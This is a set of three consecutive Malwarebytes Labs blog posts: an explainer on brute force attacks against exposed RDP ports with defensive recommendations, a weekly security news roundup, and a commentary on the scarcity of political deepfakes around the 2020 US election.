A brute force attack is where an attacker tries every way he can think of to get in. Including throwing the kitchen sink at it. In cases where the method they are trying is to get logged in to your system, they will try endless combinations of usernames and passwords until a combination works.

Brute force attacks are usually automated, so it doesn’t cost the attacker a lot of time or energy. Certainly not as much as individually trying to figure out how to access a remote system. Based on a port number or another system specific property, the attacker picks the target and the method and then sets his brute force application in motion. He can then move on to the next target and will get notified when one of the systems has swallowed the hook.

Brute force methods

When trying to gain access to a remote system, an attacker will use one of these different types of attacks:

• Reverse brute force attack. This type uses a common password or collection of passwords against many possible usernames. Sometimes the attacker may have an idea about the username or a part thereof. For example, they may know that a specific organization uses {first name}@{organization} as the default username for their employees. The attacker can then try a specific list of usernames and random passwords.
• Credential stuffing is a type of attack where the criminal has a database of valid username and password combinations (usually stolen from other breaches) and tries out all these combinations on different systems. This is why it is never a good idea to reuse your passwords.
• A hybrid brute force attack starts with the most feasible combinations and then keeps on trying from there. It often uses a dictionary attack where the application tries usernames or passwords using a dictionary of possible strings or phrases.
• Rainbow table attacks only work when the attacker has some knowledge about the password they are trying to guess. In these attacks rainbow tables are used to recover a password based on its hash value. A rainbow table is a hash function used in cryptography for storing important data such as passwords in a database.

Brute forcing RDP ports

RDP attacks are one of the main entry points when it comes to targeted ransomware operations. To increase effectiveness, ransomware attacks are getting more targeted and one of the primary attack vectors is the Remote Desktop Protocol (RDP). Remote desktop is exactly what the name implies, an option to remotely control a computer system. It almost feels as if you were actually sitting behind that computer. Which is exactly what makes an attacker with RDP access so dangerous.

Because of the current pandemic, many people are working from home and may be doing so for a while to come. Working from home has the side effect of more RDP ports being opened. Not only to enable the workforce to access company resources from home, but also to enable IT staff to troubleshoot problems on the workers’ devices. A lot of enterprises rely on tech support teams using RDP to troubleshoot problems on employee’s systems.

But ransomware, although prevalent, is not the only reason for these types of attacks. Cybercriminals can also install keyloggers or other spyware on target systems to learn more about the organization they have breached. Other possible objectives might be data theft, espionage, or extortion.

Protect against brute force attacks

We’ve posted recommendations to protect against RDP attacks before. You can read more details in that post but basically the protection measures come down to:

• Limit the number of open ports
• Restrict the access to those that need it
• Enhance security of the port and the protocol

The same basic security measures apply to other ports. In cybersecurity, the term open port refers to a TCP or UDP port number that is configured to accept packets. In contrast, a port which rejects connections or ignores all packets, is a closed port. The less open ports you have facing the internet, the safer it is. Limiting the number of open ports is a good start but closing all of them is almost never feasible.

For the ports that need to remain open and where you do expect visitors, it’s a good idea to disable legacy usernames, rotate passwords, and use 2FA if you can.

Security software guarding the entire network should raise alarm bells when a great number of attempts are detected. Anything that behaves like a brute force attack will look so different from normal login attempts that it shouldn’t be a problem if it is blocked. When a brute force attacker gets locked out for a few minutes after a few failed attempts, this will slow them down a lot and give you ample opportunity to take corrective and defensive measures.

It’s a numbers game

Many open ports can be used in a brute force attack, but RDP ports are the most desirable for anyone trying to gain access. RDP is easier because the attacker may have a reasonable idea about the username and only needs to brute force the password. It also offers a successful attacker a good chance to infiltrate the organization’s network further.

As mentioned earlier, the shift to working from home has caused a big raise in the number of open RDP ports around the globe. The number of RDP ports exposed to the Internet grew from about three million in January 2020 to over four and a half million in March. At Malwarebytes we noticed a similar surge in compromised servers that are used to run brute force tools or scan the Internet for vulnerable ports. Malwarebytes protects its customers by blocking the traffic from these IP addresses.

And please don’t think this can’t happen to your organization. We’ve seen high profile companies fall victim to ransomware where the suspected point of entry was an open RDP port.

Stay safe everyone!

The post Brute force attacks increase due to more open RDP ports appeared first on Malwarebytes Labs.

Last week on Malwarebytes Labs, we looked at journalism’s role in cybersecurity on our Lock and Code podcast, gave tips for safer shopping on Amazon Prime day, and discussed an APT attack springing into life as Academia returned to the real and virtual campus environment. We also dug into potential FIFA 21 scams, the return of QR code scams, Covid fatigue, and the absence of Deepfakes from the 2020 US elections.

Other cybersecurity news

• Coronavirus SMS spoof risk: Researcher warns that genuine messages can be impersonated (Source: The Register)

• Hacked Hackney: Hackney council warns of a “serious cyberattack on council systems” (Source: Hackney Council)
• Football frenzy: Steer clear of FIFA 21 themed gaming scams (Source: Daily Express)
• Expanding the Online Harms bill: Calls for UKGOV to add online scams to the Online Harms Bill, intended to tackle the growing number of problems on the internet (Source: Yahoo News)
• Those scams belong in a museum: Museum Director’s Facebook page used to scam people online (Source: Chicago CBS Local)
• Plugging the virtual gaps: virtual appliance security remains a headache for businesses (Source: Help Net Security)
• Going on the offensive: The problems caused when malware gangs dabble in open source tools (Source: ZDNet)
• A veritable laundry list: group charged with money laundering for malware operations (Source: ZDNet)
• An Office trick or treat: it’s actually just a trick, in the form of fake updates downloading malware (source: Kim Komando)
• Google ramps up assistance: the Advanced Protection Program receives a few upgrades for those in need of it (Source: TechRadar)

Stay safe, everyone!

The post A week in security (October 12 – October 18) appeared first on Malwarebytes Labs.

If you believe reports in the news, impending deepfake disaster is headed our way in time for the 2020 United States election. Political intrigue, dubious clips, mischief and mayhem were all promised. We’ll need to be careful around clips of the President issuing statements about being at war, or politicians making defamatory statements. Everything is up for grabs, and in play, or at stake. Then, all of a sudden…it wasn’t.

Nothing happened. Nothing has continued to happen. Where did our politically charged deepfake mayhem go to? Could it still happen? Is there time? With all the increasingly surreal things happening on a daily basis, would anybody even care?

The answer is a cautious “no, they probably wouldn’t.” As we’ve mentioned previously, there are two main schools of thought on this. Shall we have a quick refresher?

Following the flow

Stance 1: Catastrophe and chaos rain down from the heavens. The missiles will launch. Extreme political shenanigans will cause skulduggery and intrigue of the highest order. Democracy as we know it is imperilled. None of us will emerge unscathed. Deepfakes imperil everything.

Stance 2: Deepfakes have jumped the shark. They’d have been effective political tools when nobody knew about them. They’re more useful for subversive influence campaigns off the beaten track. You have to put them in the places you least expect, because people quite literally expect them. They’re yesterday’s news.

Two fairly diverse stances, and most people seem to fall in one of the two camps. As far as the US election goes, what is the current state of play?

2020 US election: current state of play

Imagine our surprise when instead of deepfaked election chaos, we have a poorly distorted gif you can make on your phone. It’s heralded as the first strike of deepfakes “for electioneering purposes”.

It’s dreadful. Something you’d see in the comment section of a Myspace page, as pieces of face smear and warp this way and that. People are willing to call pretty much anything a deepfake to add weight to their points. The knock-on effect of this is overload and gradual disinterest due to hype. Things many would consider a deepfake are turned away at the door as a result of everything in sight being called a deepfake.

This is a frankly ludicrous situation. Even so, outside of the slightly tired clips we’ve already seen, there doesn’t appear to be any election inroad for scammers or those up to no good.

What happened to my US election deepfakes?

The short answer is people seem to be much more taken with pornographic possibilities than bringing down Governments. According to Sensity data, the US is the most heavily targeted nation for deepfake activity. That’s some 45.4%, versus the UK in second place with just 10.4%, South Korea with 9.1%, and India at 5.2%. The most popular targeted sector is entertainment with 63.9%, followed by fashion at 20.4%, and politics with a measly 4.5%.

We’ve seen very few (if any) political deepfakes aimed at South Korean politicians. For all intents and purposes, they don’t exist. What there is an incredible amount of, are pornographic fakes of South Korean K-Pop singers shared on forums and marketplaces. This probably explains South Korea’s appearance in third place overall and is absolutely contributing to the high entertainment sector rating.

Similarly adding to both US and entertainment tallies, are US actresses and singers. Again, most of those clips tend to be pornographic in nature. This isn’t a slow trickle of generated content. It’s no exaggeration to say that one single site will generate pages of new fakes per day, with even more in the private/paid-for sections on their forums.

This is awful news for the actresses and singers currently doomed to find themselves uploaded all over these sites without permission. Politicians, for the most part, get off lightly.

What are we left with?

Besides the half dozen or so clips from professional orgs saying “What if Trump/Obama/Johnson/Corbyn said THIS” with a clip of said politician saying it (and they’re not that great either), it’s basically amateur hour out there. There’s a reasonably consistent drip-feed of parody clips on YouTube, Facebook, and Twitter. It’s not Donald Trump declaring war on China. It isn’t Joe Biden announcing an urgent press briefing about Hilary Clinton’s emails. It’s not Alexandria Ocasio-Cortez telling voters to stay home because the local voting station has closed.

What it is, is Donald Trump and Joe Biden badly lip-syncing their way through Bohemian Rhapsody on YouTube. It’s Trump and Biden talking about a large spoon edited into the shot with voices provided by someone else. I was particularly taken by the Biden/Trump rap battle doing the rounds on Twitter.

As you may have guessed, I’m not massively impressed by what’s on offer so far. If nothing else, one of the best clips for entertainment purposes I’ve seen so far is from RT, the Russian state-controlled news network. 

Big money, minimal returns?

Consider how much money RT must have available for media projects, and what they could theoretically sink into something they clearly want to make a big splash with. And yet, for all that…it’s some guy in a Donald Trump wig, with an incredibly obviously fake head pasted underneath it. The lips don’t really work, the face floats around the screen a bit, evidently not sharing the same frame of reference as the body. The voice, too, has a distinct whiff of fragments stitched together.

So, a convincing fake? Not at all. However, is that the actual aim? Is it deliberately bad, so they don’t run a theoretical risk of getting into trouble somehow? Or is this quite literally the best they can do?

If it is, to the RT team who put it together: I’m sorry. Please, don’t cry. I’m aiming for constructive criticism here.

They’re inside the walls

Curiously, instead of a wave of super-dubious deepfakes making you lose faith in the electoral system, we’ve ended up with…elected representatives slinging the fakes around instead.

By fakes, I don’t mean typical “cheapfakes”, or photoshops. I mean actual deepfakes.

Well, one deepfake. Just one.

“If our campaign can make a video like this, imagine what Putin is doing right now”

Bold words from Democratic candidate Phil Ehr, in relation to a deepfake his campaign team made showing Republican Matt Gaetz having a political change of heart. He wants to show how video and audio manipulation can influence elections and other important events.

Educating the public in electioneering shenanigans is certainly a worthwhile goal. Unfortunately, I have to highlight a few problems with the approach:

1. People don’t watch things from start to finish. Whole articles go unread beyond the title and maybe the first paragraph. TV shows progress no further than the first ad break. People don’t watch ad breaks. It’s quite possible many people will get as far as Matt Gaetz saying how cool he thinks Barack Obama is, then abandon ship under the impression it was all genuine.
2. “If we can make a video like this” implies what you’re about to see is an incredible work of art. It’s terrible. The synthetic Matt Gaetz looks like he wandered in off the set of a Playstation 3 game. The voice is better, but still betrayed by that halting, staccato lilt so common in audio fakery. One would hope the visuals being so bad would take care of 1), but people not really paying attention or with a TV on in the background are in for a world of badly digitised hurt.

An acceptable use of technology?

However you stack this one up, I think it’s broadly unhelpful to normalise fakes in this way during election cycles regardless of intention. Note there’s also no “WARNING: THIS IS FAKE” type message at the start of the clip. This is bad, considering you can detach media from Tweets and repurpose.

It’s the easiest thing in the world to copy the code for the video and paste it into your own Tweet minus his disclaimer. You could just as easily download it, edit out the part at the end which explains the purpose, and put it back on social media platforms. There’s so many ways you can get up to mischief with a clip like this it’s not even funny.

Bottom line: I don’t think this is a good idea.

Fakes in different realms

Other organisations have made politically-themed fakes to cement the theoretical problems posed by deepfakes during election time, and these ones are actually quite good. You can still see the traces of uncanny valley in there though, and we must once again ask: is it worth the effort? When major news cycles rotate around things as basic as conspiracy theories and manipulation, perhaps fake Putin isn’t the big problem here.

If you were in any doubt as to where the law enforcement action is on this subject: it’s currently pornography. Use of celebrity faces in deepfakes is now officially attracting the attention of the thin blue line. You can read more on deepfake threats (political or otherwise) in this presentation by expert Kelsey Farish.

Cleaning up the house

That isn’t to say things might not change. Depending on how fierce the US election battle is fought, strange deepfake things could still be afoot at the eleventh hour. Whether it makes any difference or not is another thing altogether, and if low-grade memes or conspiracy theories are enough to get the job done then that’s what people will continue to do.

Having said that: you can keep a watchful eye on possible foreign interference in the US election via this newly released attribution tracker. Malign interference campaigns will probably continue as the main driver of GAN generated imagery. Always be skeptical, regardless of suspicions over AI involvement. The truth is most definitely out there…it just might take a little longer to reach than usual.

The post Deepfakes and the 2020 United States election: missing in action? appeared first on Malwarebytes Labs.